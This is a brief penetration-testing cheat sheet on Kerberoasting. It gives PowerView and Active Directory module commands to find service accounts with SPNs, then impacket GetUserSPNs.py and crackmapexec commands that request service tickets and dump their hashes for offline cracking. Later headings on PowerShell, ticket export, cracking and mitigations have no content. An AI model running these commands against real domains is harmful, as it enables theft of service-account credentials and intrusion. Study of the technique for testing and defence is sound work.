Kerberoasting
Find Service Accounts as User Accounts
# PowerView
Get-NetUser -SPN | select samaccountname
# AD Module
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName | select samaccountnameThen Grab the Hashes
From Linux
# impacket
python3 GetUserSPNs.py <domain>/<user> -request -dc-ip <ip>
# crackmapexec
crackmapexec ldap <ip> -u <user> -p <pass> --kerberoasting KERBEROASTING [--kdcHost <dc-ip>]Grabbing Hashes Directly From Powershell
Creating TGS's and Exporting the Tickets
Cracking Tickets Offline
Mitigations
Last updated